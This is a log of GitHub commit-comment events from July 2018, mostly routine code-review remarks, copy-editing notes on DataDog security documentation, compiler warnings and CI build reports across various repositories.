{"id":"7944481991","type":"CommitCommentEvent","actor":{"login":"Nyalab"},"repo":{"name":"Nyalab/caniuse-api"},"payload":{"comment":{"id":29658311,"position":null,"line":null,"path":null,"commit_id":"11c90915c4f34543fb238b9c421f6f0733b5a81b","created_at":"2018-07-10T15:10:52Z","updated_at":"2018-07-10T15:10:52Z","author_association":"OWNER","body":"totally, i'm doing it"}},"created_at":"2018-07-10T15:10:52Z"}
{"id":"7944483379","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658316,"position":24,"line":24,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:11:05Z","updated_at":"2018-07-10T15:11:05Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T15:11:05Z"}
{"id":"7944489587","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658326,"position":31,"line":31,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:12:00Z","updated_at":"2018-07-10T15:12:00Z","author_association":"CONTRIBUTOR","body":"`The GUI will only be launched if the user launching ` => `The GUI is launched only if the user launching...`"}},"created_at":"2018-07-10T15:12:00Z"}
{"id":"7944489771","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658327,"position":15,"line":15,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:12:02Z","updated_at":"2018-07-10T15:12:02Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T15:12:02Z"}
{"id":"7944491110","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658329,"position":13,"line":13,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:12:14Z","updated_at":"2018-07-10T15:12:14Z","author_association":"CONTRIBUTOR","body":"this should be a link"}},"created_at":"2018-07-10T15:12:14Z"}
{"id":"7944494459","type":"CommitCommentEvent","actor":{"login":"HombreTech"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29658333,"position":47,"line":47,"path":"app/src/main/kotlin/ru/fantlab/android/ui/adapter/viewholder/EditionsViewHolder.kt","commit_id":"f46c2efbd64d81d9a6459b641355f5a9396399c0","created_at":"2018-07-10T15:12:45Z","updated_at":"2018-07-10T15:12:45Z","author_association":"COLLABORATOR","body":"Для Regex`ов - нельзя."}},"created_at":"2018-07-10T15:12:45Z"}
{"id":"7944497892","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29658336,"position":null,"line":null,"path":null,"commit_id":"af49a1806b37e97d7d189b2832dfca465f2a5fd2","created_at":"2018-07-10T15:13:15Z","updated_at":"2018-07-10T15:13:15Z","author_association":"MEMBER","body":"ci 挂了"}},"created_at":"2018-07-10T15:13:15Z"}
{"id":"7944498915","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658339,"position":43,"line":43,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:13:24Z","updated_at":"2018-07-10T15:13:24Z","author_association":"CONTRIBUTOR","body":"Agent should be capitalized"}},"created_at":"2018-07-10T15:13:24Z"}
{"id":"7944503045","type":"CommitCommentEvent","actor":{"login":"Monika-Kumar"},"repo":{"name":"Monika-Kumar/monika.tech"},"payload":{"comment":{"id":29658348,"position":null,"line":null,"path":null,"commit_id":"a9f15155d864109fdb9030a57ad82934d3d21b21","created_at":"2018-07-10T15:14:02Z","updated_at":"2018-07-10T15:14:02Z","author_association":"OWNER","body":"mypic"}},"created_at":"2018-07-10T15:14:02Z"}
{"id":"7944503328","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658351,"position":6,"line":6,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:14:05Z","updated_at":"2018-07-10T15:14:05Z","author_association":"CONTRIBUTOR","body":"you don't need to set an alias on the page path, it's redundant."}},"created_at":"2018-07-10T15:14:05Z"}
{"id":"7944504526","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658357,"position":6,"line":6,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:14:16Z","updated_at":"2018-07-10T15:14:16Z","author_association":"CONTRIBUTOR","body":"you don't need to set an alias on the page path, it's redundant."}},"created_at":"2018-07-10T15:14:16Z"}
{"id":"7944504685","type":"CommitCommentEvent","actor":{"login":"masterBaster"},"repo":{"name":"masterBaster/angular-tour-of-heroes"},"payload":{"comment":{"id":29658358,"position":null,"line":null,"path":null,"commit_id":"b7d6f98af06f9ad88caf2f0e78b8691f29a28c64","created_at":"2018-07-10T15:14:18Z","updated_at":"2018-07-10T15:14:18Z","author_association":"OWNER","body":"added conteiner class"}},"created_at":"2018-07-10T15:14:18Z"}
{"id":"7944504777","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29658359,"position":null,"line":null,"path":null,"commit_id":"4b523625088b8441f9e4183c97b8d0d578e47d6d","created_at":"2018-07-10T15:14:18Z","updated_at":"2018-07-10T15:14:18Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.45.4b523625088b8441f9e4183c97b8d0d578e47d6d](http://build.palaso.org/viewLog.html?buildId=124527&buildTypeId=HearThis_HearThisPullRequests) outcome was **SUCCESS**\nSummary: Running Build time: 00:03:22"}},"created_at":"2018-07-10T15:14:18Z"}
{"id":"7944505439","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658360,"position":6,"line":6,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:14:24Z","updated_at":"2018-07-10T15:14:24Z","author_association":"CONTRIBUTOR","body":"you don't need to set an alias on the page path, it's redundant."}},"created_at":"2018-07-10T15:14:24Z"}
{"id":"7944506889","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658361,"position":19,"line":19,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:14:38Z","updated_at":"2018-07-10T15:14:38Z","author_association":"CONTRIBUTOR","body":"Capitalize Agent. Punctuation goes inside quotation marks: `\"strong cryptography,\" for example`"}},"created_at":"2018-07-10T15:14:38Z"}
{"id":"7944512591","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"lczech/swarm"},"payload":{"comment":{"id":29658381,"position":null,"line":null,"path":null,"commit_id":"f7b0c450ae37c857d8b0d65c11b2c26ad23ede04","created_at":"2018-07-10T15:15:30Z","updated_at":"2018-07-10T15:15:30Z","author_association":"NONE","body":"some compilation warnings (maybe not due to your edits though):\r\n```\r\nscan.cc:28:15: warning: type ‘struct thread_info_s’ violates the C++ One Definition Rule [-Wodr]\r\n static struct thread_info_s\r\n               ^\r\nalgod1.cc:87:15: note: a different type is defined in another translation unit\r\n static struct thread_info_s\r\n               ^\r\nscan.cc:37:17: note: the first difference of corresponding definitions is field ‘seed’\r\n   unsigned long seed;\r\n                 ^\r\nalgod1.cc:93:19: note: a field with different name is defined in another translation unit\r\n   unsigned char * varseq;\r\n                   ^\r\n```"}},"created_at":"2018-07-10T15:15:30Z"}
{"id":"7944514341","type":"CommitCommentEvent","actor":{"login":"VonLatvala"},"repo":{"name":"jenkinsci/sonarqube-plugin"},"payload":{"comment":{"id":29658386,"position":null,"line":null,"path":null,"commit_id":"caafcbbc6d37e545be2c8d25f7f0ba46161da8a0","created_at":"2018-07-10T15:15:46Z","updated_at":"2018-07-10T15:15:46Z","author_association":"NONE","body":"how about using 127.0.0.1? This might resolve to ::1"}},"created_at":"2018-07-10T15:15:46Z"}
{"id":"7944514586","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658388,"position":23,"line":23,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:15:48Z","updated_at":"2018-07-10T15:15:48Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T15:15:48Z"}
{"id":"7944521640","type":"CommitCommentEvent","actor":{"login":"robnagler"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":29658396,"position":4,"line":55,"path":"sirepo/sr_unit.py","commit_id":"19cd0776eba84aca7269984753d52f1ee25699b3","created_at":"2018-07-10T15:16:53Z","updated_at":"2018-07-10T15:16:53Z","author_association":"MEMBER","body":"This was to exercise more codes. We don't have a good way of knowing what codes are installed in the unit test. "}},"created_at":"2018-07-10T15:16:53Z"}
{"id":"7944529143","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29658417,"position":null,"line":null,"path":null,"commit_id":"f448be983e17f53b87a2af49a541c9fd5c422a61","created_at":"2018-07-10T15:18:01Z","updated_at":"2018-07-10T15:18:01Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T15:18:01Z"}
{"id":"7944530716","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29658423,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T15:18:16Z","updated_at":"2018-07-10T15:18:16Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T15:18:16Z"}
{"id":"7944533232","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658432,"position":23,"line":23,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:18:39Z","updated_at":"2018-07-10T15:18:39Z","author_association":"CONTRIBUTOR","body":"Capitalise Agent"}},"created_at":"2018-07-10T15:18:39Z"}
{"id":"7944533640","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_6"},"payload":{"comment":{"id":29658433,"position":14,"line":11,"path":"css/style.css","commit_id":"6bf4e764cb2a506cf7208c13062043940b9c0a00","created_at":"2018-07-10T15:18:43Z","updated_at":"2018-07-10T15:18:43Z","author_association":"NONE","body":"można użyć tutaj skróconego zapisu `#fff` to to samo co `#ffffff` "}},"created_at":"2018-07-10T15:18:43Z"}
{"id":"7944534082","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658434,"position":27,"line":27,"path":"content/security/logs.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:18:47Z","updated_at":"2018-07-10T15:18:47Z","author_association":"CONTRIBUTOR","body":"capitalize Agent"}},"created_at":"2018-07-10T15:18:47Z"}
{"id":"7944536009","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658436,"position":5,"line":5,"path":"content/security/other.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:19:03Z","updated_at":"2018-07-10T15:19:03Z","author_association":"CONTRIBUTOR","body":"you don't need to set an alias on the page path, it's redundant."}},"created_at":"2018-07-10T15:19:03Z"}
{"id":"7944537672","type":"CommitCommentEvent","actor":{"login":"YMajid"},"repo":{"name":"YMajid/Y2Y"},"payload":{"comment":{"id":29658439,"position":null,"line":null,"path":null,"commit_id":"79176b882d0ad189e9e7712b55cfe3c4cb316418","created_at":"2018-07-10T15:19:18Z","updated_at":"2018-07-10T15:19:18Z","author_association":"OWNER","body":"Load instead of training program for sentiment analysis everytime"}},"created_at":"2018-07-10T15:19:18Z"}
{"id":"7944537746","type":"CommitCommentEvent","actor":{"login":"awilli69"},"repo":{"name":"awilli69/hdfio"},"payload":{"comment":{"id":29658440,"position":null,"line":null,"path":null,"commit_id":"fe878aa5323ad52147d3ea61ab68298ba99c8f5b","created_at":"2018-07-10T15:19:19Z","updated_at":"2018-07-10T15:19:19Z","author_association":"OWNER","body":"Just committing to get the newest version of the hdfio project."}},"created_at":"2018-07-10T15:19:19Z"}
{"id":"7944538660","type":"CommitCommentEvent","actor":{"login":"EmDevys"},"repo":{"name":"opengeospatial/geotiff"},"payload":{"comment":{"id":29658442,"position":null,"line":null,"path":null,"commit_id":"1ccab275a7350bfb04c4dfdb237a4aef22184484","created_at":"2018-07-10T15:19:28Z","updated_at":"2018-07-10T15:19:28Z","author_association":"CONTRIBUTOR","body":"band definition\r\nSource ISO/TS 19101-2:2008: range of wavelengths of electromagnetic radiation that produce a single response by a sensing device. (also correct the reference to **ISO** 19101-2:2008, 4.1)\r\n--\r\ncoverage: is this definition necessary? (it appears that it is unused). However the grid definition of ISO 19123 - Schema for coverage geometry and functions is used => Consider whether it is of interest to keep this definition\r\n--\r\ngeocoding: add source ISO 19133:2005\r\n--\r\ngrid: there are 2 entries in the commit => 1st entry should be deleted\r\n--\r\northorectified grid: is this definition needed (of interest)? The definition of orthoimage is appears clearer, and is available in ISO 19101-2:2008: image in which by orthogonal projection to a reference surface, displacement of image points due to sensor orientation and terrain relief has been removed\r\npixel: add reference to ISO/TS 19101-2:2008\r\n--\r\nrange : is this definition necessary? (it appears that it is unused) => proposal to suppress this definition\r\nreferenceable grid: is this definition necessary? (it appears that it is unused) => proposal to suppress this definition\r\n--\r\nrelative accuracy / relative positional accuracy: is this definition necessary? (it appears that it is unused) => proposal to suppress this definition"}},"created_at":"2018-07-10T15:19:28Z"}
{"id":"7944538728","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658443,"position":14,"line":14,"path":"content/security/other.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:19:28Z","updated_at":"2018-07-10T15:19:28Z","author_association":"CONTRIBUTOR","body":"Should we say `Datadog product and Agent`? "}},"created_at":"2018-07-10T15:19:28Z"}
{"id":"7944540617","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658449,"position":18,"line":18,"path":"content/security/other.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:19:46Z","updated_at":"2018-07-10T15:19:46Z","author_association":"CONTRIBUTOR","body":"capitalize `Agent`"}},"created_at":"2018-07-10T15:19:46Z"}
{"id":"7944541091","type":"CommitCommentEvent","actor":{"login":"robnagler"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":29658451,"position":8,"line":26,"path":"sirepo/importer.py","commit_id":"19cd0776eba84aca7269984753d52f1ee25699b3","created_at":"2018-07-10T15:19:50Z","updated_at":"2018-07-10T15:19:50Z","author_association":"MEMBER","body":"This should be encapsulated in a module. We shouldn't proliferate this type of usage, rather have a single module that does the opens. Right now pkio is that module. I don't understand why there are different usages, also. Why is it `import io as StringIO` and `from six import io`?"}},"created_at":"2018-07-10T15:19:50Z"}
{"id":"7944545775","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658459,"position":28,"line":28,"path":"content/security/other.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:20:32Z","updated_at":"2018-07-10T15:20:32Z","author_association":"CONTRIBUTOR","body":"`more than 250 built-in integrations`"}},"created_at":"2018-07-10T15:20:32Z"}
{"id":"7944546509","type":"CommitCommentEvent","actor":{"login":"robnagler"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":29658461,"position":13,"line":24,"path":"tests/exporter_test.py","commit_id":"19cd0776eba84aca7269984753d52f1ee25699b3","created_at":"2018-07-10T15:20:38Z","updated_at":"2018-07-10T15:20:38Z","author_association":"MEMBER","body":"This change removes a bunch of tests. Is there a reason for this?"}},"created_at":"2018-07-10T15:20:38Z"}
{"id":"7944548477","type":"CommitCommentEvent","actor":{"login":"lwhite1"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29658466,"position":5,"line":15,"path":"pom.xml","commit_id":"2207d598858c891a41bbbacfefaceabab75e6511","created_at":"2018-07-10T15:20:54Z","updated_at":"2018-07-10T15:20:54Z","author_association":"COLLABORATOR","body":"0.21 is on maven.\nhttps://mvnrepository.com/artifact/tech.tablesaw/tablesaw-core/0.21.0\n\nI had considerable difficulty getting the release made. I emailed you about\nit last week, but then it showed. up. No doubt I made several mistakes in\nthe process.\n\nOn Tue, Jul 10, 2018 at 10:55 AM Ben McCann <notifications@github.com>\nwrote:\n\n> Did you cut a release? I'm not seeing it on Maven Search yet, but it could\n> just be a delay. Usually it takes an hour. But I don't see a release tagged\n> on GitHub\n>\n> According to SO, when we're developing the next version we should have tag\n> set to HEAD\n> <https://stackoverflow.com/questions/23718601/what-is-the-usage-of-maven-pom-xml-tag-element-inside-of-scm-when-you-are>.\n> Then when we want to cut a release we can run mvn release:prepare\n> followed by mvn release:perform and it will update the tag accordingly\n> for us\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jtablesaw/tablesaw/commit/2207d598858c891a41bbbacfefaceabab75e6511#commitcomment-29658022>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADRXgs8Bv7WUJH35Efc4vFGzBy7triKYks5uFMBpgaJpZM4VJkc_>\n> .\n>\n"}},"created_at":"2018-07-10T15:20:54Z"}
{"id":"7944553615","type":"CommitCommentEvent","actor":{"login":"merbst"},"repo":{"name":"VivianePons/vivianepons.github.com"},"payload":{"comment":{"id":29658479,"position":null,"line":null,"path":null,"commit_id":"b355b3f1ed9592a6d294e8691973382865387dd6","created_at":"2018-07-10T15:21:43Z","updated_at":"2018-07-10T15:21:43Z","author_association":"NONE","body":"Hi Vivianne, excellent writing about Colombia, I now would like to travel to South America after I visit Europe/France."}},"created_at":"2018-07-10T15:21:43Z"}
{"id":"7944555837","type":"CommitCommentEvent","actor":{"login":"lczech"},"repo":{"name":"lczech/swarm"},"payload":{"comment":{"id":29658481,"position":null,"line":null,"path":null,"commit_id":"f7b0c450ae37c857d8b0d65c11b2c26ad23ede04","created_at":"2018-07-10T15:22:05Z","updated_at":"2018-07-10T15:22:05Z","author_association":"OWNER","body":"Thanks, nope, those are not variables that I touched or used. Have to wait for @torognes for more information on those."}},"created_at":"2018-07-10T15:22:05Z"}
{"id":"7944557408","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658485,"position":6,"line":6,"path":"content/security/tracing.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:22:19Z","updated_at":"2018-07-10T15:22:19Z","author_association":"CONTRIBUTOR","body":"you don't need to set an alias on the page path, it's redundant."}},"created_at":"2018-07-10T15:22:19Z"}
{"id":"7944560488","type":"CommitCommentEvent","actor":{"login":"mohamedabdohelmy"},"repo":{"name":"mohamedabdohelmy/CircleMenu"},"payload":{"comment":{"id":29658490,"position":null,"line":null,"path":null,"commit_id":"a1d3bc286b362f04af2e238856a744319cddd758","created_at":"2018-07-10T15:22:45Z","updated_at":"2018-07-10T15:22:45Z","author_association":"OWNER","body":"mtp://[usb:003,007]/SD%20card/Pictures/Screenshots/menu.png"}},"created_at":"2018-07-10T15:22:45Z"}
{"id":"7944560856","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29658491,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T15:22:48Z","updated_at":"2018-07-10T15:22:48Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T15:22:48Z"}
{"id":"7944567458","type":"CommitCommentEvent","actor":{"login":"zah"},"repo":{"name":"status-im/nim-eth-rpc"},"payload":{"comment":{"id":29658508,"position":46,"line":46,"path":"json_rpc/router.nim","commit_id":"cf44cc552d8a02c6a0139a79a8f73bca815205f1","created_at":"2018-07-10T15:23:48Z","updated_at":"2018-07-10T15:23:48Z","author_association":"MEMBER","body":"`tryRoute` would be a more traditional choice of name for this."}},"created_at":"2018-07-10T15:23:48Z"}
{"id":"7944567484","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658509,"position":19,"line":19,"path":"content/security/tracing.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:23:48Z","updated_at":"2018-07-10T15:23:48Z","author_association":"CONTRIBUTOR","body":"sound defaults?"}},"created_at":"2018-07-10T15:23:48Z"}
{"id":"7944568534","type":"CommitCommentEvent","actor":{"login":"StefanKarpinski"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29658511,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T15:23:57Z","updated_at":"2018-07-10T15:23:57Z","author_association":"MEMBER","body":"I think that pre-compilation should probably guard against this in general rather than special casing this."}},"created_at":"2018-07-10T15:23:57Z"}
{"id":"7944568593","type":"CommitCommentEvent","actor":{"login":"ericentin"},"repo":{"name":"safwank/ElixirRetry"},"payload":{"comment":{"id":29658512,"position":null,"line":null,"path":null,"commit_id":"5132f1135f3c2bd34db70c4dacecee0c74ccef4b","created_at":"2018-07-10T15:23:58Z","updated_at":"2018-07-10T15:23:58Z","author_association":"NONE","body":"You should not break backwards compatibility without incrementing the major version number. This release should have been 1.0.0"}},"created_at":"2018-07-10T15:23:58Z"}
{"id":"7944569124","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658513,"position":21,"line":21,"path":"content/security/tracing.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:24:03Z","updated_at":"2018-07-10T15:24:03Z","author_association":"CONTRIBUTOR","body":"capitalize `Agent`"}},"created_at":"2018-07-10T15:24:03Z"}
{"id":"7944570014","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29658521,"position":null,"line":null,"path":null,"commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-10T15:24:12Z","updated_at":"2018-07-10T15:24:12Z","author_association":"CONTRIBUTOR","body":"@Gottox \r\n\r\n```\r\nutil.c:42:10: fatal error: openssl/md5.h: No such file or directory\r\n #include <openssl/md5.h>\r\n          ^~~~~~~~~~~~~~~\r\n```\r\n\r\nthat is part of libressl-devel"}},"created_at":"2018-07-10T15:24:12Z"}
{"id":"7944570399","type":"CommitCommentEvent","actor":{"login":"danehans"},"repo":{"name":"istio/istio.github.io"},"payload":{"comment":{"id":29658522,"position":null,"line":null,"path":null,"commit_id":"902ab5cdc01d71bea21000fed3089e607b91d042","created_at":"2018-07-10T15:24:15Z","updated_at":"2018-07-10T15:24:15Z","author_association":"CONTRIBUTOR","body":"I thought this is needed so docs can mirror the release process outlined here:\r\n\r\nhttps://groups.google.com/forum/m/#!topic/istio-dev/tcDEwvBaTgw"}},"created_at":"2018-07-10T15:24:15Z"}
{"id":"7944571655","type":"CommitCommentEvent","actor":{"login":"aketema"},"repo":{"name":"aketema/TicTacToe"},"payload":{"comment":{"id":29658524,"position":null,"line":null,"path":null,"commit_id":"0d260bcc16527ba8cf8cb6baa3cc44c7cffc56c5","created_at":"2018-07-10T15:24:25Z","updated_at":"2018-07-10T15:24:25Z","author_association":"OWNER","body":"i just added a comment"}},"created_at":"2018-07-10T15:24:25Z"}
{"id":"7944573160","type":"CommitCommentEvent","actor":{"login":"greg-hellings"},"repo":{"name":"crosswire/xiphos"},"payload":{"comment":{"id":29658535,"position":null,"line":null,"path":null,"commit_id":"4d6c2addf91243979983afa1df2d83ccbf5a2cd5","created_at":"2018-07-10T15:24:40Z","updated_at":"2018-07-10T15:24:40Z","author_association":"CONTRIBUTOR","body":"Ubuntu 14.04 LTS, which still has a year of life left on it, has GTK 3.10. Generally that's the oldest we care about. (CentOS/RHEL 6 completely lacks gtk3 from what I can tell and 7 only has it in the EPEL repository so it's pretty up to date at 3.22)"}},"created_at":"2018-07-10T15:24:40Z"}
{"id":"7944575451","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658541,"position":46,"line":46,"path":"content/security/tracing.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:25:00Z","updated_at":"2018-07-10T15:25:00Z","author_association":"CONTRIBUTOR","body":"Capitalize `Agent`"}},"created_at":"2018-07-10T15:25:00Z"}
{"id":"7944577396","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658544,"position":50,"line":50,"path":"content/security/tracing.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:25:18Z","updated_at":"2018-07-10T15:25:18Z","author_association":"CONTRIBUTOR","body":"Capitalize `Agent`"}},"created_at":"2018-07-10T15:25:18Z"}
{"id":"7944578032","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29658546,"position":null,"line":null,"path":null,"commit_id":"efdbbf196b7e177b4c0e44ffc5fcb2aa5819a7e7","created_at":"2018-07-10T15:25:25Z","updated_at":"2018-07-10T15:25:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-320](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-320).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-320-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T15:25:25Z"}
{"id":"7944580038","type":"CommitCommentEvent","actor":{"login":"GamakCZ"},"repo":{"name":"iiFlamiinBlaze/BlazinJoin"},"payload":{"comment":{"id":29658549,"position":13,"line":44,"path":"src/iiFlamiinBlaze/BlazinJoin/BlazinJoin.php","commit_id":"c222df5cb8168f8a666ff306ee20515fb2a9b635","created_at":"2018-07-10T15:25:42Z","updated_at":"2018-07-10T15:25:42Z","author_association":"NONE","body":"lol :joy:"}},"created_at":"2018-07-10T15:25:42Z"}
{"id":"7944600349","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658594,"position":37,"line":37,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:28:52Z","updated_at":"2018-07-10T15:28:52Z","author_association":"CONTRIBUTOR","body":"Missing word \"the\": `Additionally, Datadog leverages security scanning as part of its releases of the Container Agent to the [Docker Trusted Registry][6], as well as the [Red Hat Container Catalog][7].`"}},"created_at":"2018-07-10T15:28:52Z"}
